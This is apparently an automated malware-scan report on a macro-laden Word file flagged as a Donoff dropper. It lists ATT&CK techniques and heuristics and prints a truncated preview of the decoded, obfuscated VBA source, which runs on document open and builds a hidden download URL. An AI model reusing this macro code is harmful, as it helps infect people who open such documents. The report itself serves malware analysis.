MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening the document. The presence of CreateObject and CallByName calls further indicates the execution of arbitrary code. ClamAV detection as 'Doc.Dropper.Donoff-5743527-0' strongly suggests its malicious nature as a dropper. The VBA script's obfuscated nature prevents a detailed analysis of its specific actions, but the overall pattern points to a downloader or dropper.
Heuristics (7)
- ClamAV: Doc.Dropper.Donoff-5743527-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- CallByName call (high, OLE_VBA_CALLBYNAME): CallByName call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18325 bytes |

SHA-256 (macros.bas): 05cdab98632713532dfa634b45cd6641685b795c473a1e35b820d747a1259de7
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function LZayEVmQXU(ByVal UjmujbLzTa As Integer) As String
ecsXaTapYAWYQn
yuMNnluqr 8198
If uIAdT(8828, "Lrn9OzDaOKlgH2X09idQJj") Then
ubAHIwPRpnz
YnaEsDid = 7276
yotigvDhCKLA 4905, "veKhnvQ9N39JvLBMzFtERiNhuRZx"
NnDEk
End If
apYEF = "nURbmD7jY52UHjfB2ADrHiqEaXkH"
LZayEVmQXU = "nv3uAsJsXHXPVNj5UK67EPZ9"
End Function
Private Function nbLOTVKBuE() As Integer
RNLoUPaYOauCGu False
KPUqSBxlBqkzdI 2233, "W6HHXEQmlz0q0iAR3e1skqiybsdl0MM"
zfkhQwYfYd
nbLOTVKBuE = 5204
End Function
Private Function VeYCADk() As String
If WUdYajPldqBOdQ(9126) Then
QaHNQqgnxsfh = 8634
ybxoN
Else
lVQnfJqn True
vnmTiCl
LTKJkaHGFhQQvU
End If
exjIUwNxqc = True
VeYCADk = "GqxQFafvjJMaUfEYDf8VAq"
End Function
Private Sub Document_Open()
Cmfcqz.fAIyvwMoDWdAqG
End Sub
Private Function rXFyQZX(ByVal ochvEnvi As String, ByVal UGadh As Integer) As Integer
IofAoHKGg 4374
LooIFSQKgYpVEo
eMXMZEBzbLy
If DQrIrky Then
TiZBEVQEh
Else
sriZx = "FqDt7nx9NFkqjrjzDx2Ccq95koGvses2"
EmiHz
jYnJlKMrtPXzod
End If
rXFyQZX = 1337
End Function
Attribute VB_Name = "Cmfcqz"
Private Function tdwyv(ByVal apJLmgqOsy As Object, ByVal ztfyWpNHoNOqaM As Boolean) As Object
Dim jqkqIVPItFY As Integer
kaMztvU = False
Set tdwyv = apJLmgqOsy
End Function
Public Sub fAIyvwMoDWdAqG()
On Error GoTo DUqjBthJpZ
Nommqduu.wwmWgw
PhjzJKSXx = True
Nommqduu.KqYLMgET
EZtinYqYyuN
Exit Sub
ySxtZhW = 5724
DUqjBthJpZ:
End Sub
Private Sub EZtinYqYyuN()
Dim PcuSqW As String
Dim JTmvFoO As Integer
fToqHzgn = "wVtLUQy20i7knCcsWT97RDHEKcchS"
kzUErzyCQkAv 5737, ypaXdGjFRYNaMZ.sRntTAN, JoQQnFUulX.TOdjaw("hBXtBtpF:L/GB/XboTTlLhaOLpHiaXcT.TGeLuv/cXaGtvaFlvTovg/BoFOffOiLcveOG12v.XdXFatG", "LHTOvAFBXGJ")
lgoKJhYxMBeU = 6867
ypaXdGjFRYNaMZ.PNtsi 6258, ypaXdGjFRYNaMZ.sRntTAN
End Sub
Public Function QpmWeMJhvzGr(ByVal OWZwOtpe As String) As Object
Dim PyFUsF As String
Dim MmXNUBPKnRtC As Boolean
GDBIWT = "87uJWCqBd5Sn0HSjXZqHGdRNgLAUHE"
Set QpmWeMJhvzGr = tdwyv(CreateObject(OWZwOtpe), True)
End Function
Private Function hQhtOTpFMOjTzc(ByVal NbBDjPEzkuYvQH As String) As Integer
If CPhAR(8404, "2JBbfasTPxm0bZnkiyInL") Then
TUmMp = 7354
lmfFPiGbljYQvD
LCiFGnfso
IRkHq
kuYCu = "83m2W7L5pXkBcM9154W6sVi"
Else
qlCOyfXDlZPf
NXOjIDYsWUy "KC5c4kntPTmkXhqPRu4FLxDH2NE", 4897
HRgIXaDncrykfu
End If
ImQkyteSYNhfQB 4147, 3708, 9625
hQhtOTpFMOjTzc = 2465
End Function
Private Sub kzUErzyCQkAv(ByVal BvvfIvT As Integer, ByVal xbaJGpWLLLcle As String, ByVal CVlDhVvzJUjZ As String)
Dim SgkhPNfBT As Integer
Set oKbaR = XbxhiYrWJjE.QBWzcMnRCgzT(CVlDhVvzJUjZ, 7913, True)
XbxhiYrWJjE.Pfhdyj "rBuapSHZMLfE0rofcGKN0fd7v0vR", iDnNZI, 3895, oKbaR
vGDgvv = True
ypaXdGjFRYNaMZ.mhROn 6655, nbOZRXxObH.LEpyMKZDGWp(2621, oKbaR, "JEBcVnOHpAs8QMY8TQtPnx7aWIepKtQ9", JoQQnFUulX.TOdjaw("RFiesZNpToZnsOOeBDoFdZyq", "FYODTNiZq")), "opWXvE9AvizFoRN2GKvDBXGnfSWU0", xbaJGpWLLLcle
End Sub
Private Function iDnNZI() As String
iDnNZI = JoQQnFUulX.TOdjaw("CLa4nKL'tK L/doKw/nLl.oLa.dKK bKiKLnqaYry4 /RfiL/leq", "RKL4q./Y")
End Function
Attribute VB_Name = "JoQQnFUulX"
Private Sub FSnQpGAFsc()
WqmJNfv False, 4187, False
VfkslYky 3928, True, 3091
End Sub
Public Function rcysmwsoXa(ByVal bWGpJFFP As String, ByVal jcZSJhUcjfKDJ As Boolean, ByVal aCfTTaaPSDZGh As String) As String
Dim ikSaFKpAYYPM As Boolean
Dim mVTCzpcvmQ As Integer
GcUipgETJKI = "fborvQ5kEa8ffE54uUthbOUMGLHMP"
rcysmwsoXa = bWGpJFFP & aCfTTaaPSDZGh
End Function
Private Sub VoxxXDnocWBuze()
GpjFeBCPbB 3835, "bUiIsp9t2XfkOpmiIAJpkLptMV", 8764
cvGoxUKqh 5484, 760, 7177
tXENUnWwYO = 3182
laGSuSPAztV
End Sub
Private Function XkJNx(ByVal iLmyvAjZgRZA As String, ByVal OXCkSR As String) As String
If Not aZgRzQ.eMPnjaWlHoqH("zZi2rXi9ytx6Cj4vpaWSWswF", OXCkSR, iLmyvAjZgRZA, "EqNu46bxXQdX68yPu3Fy") Then
XkJNx = OXCkS
... (truncated)
```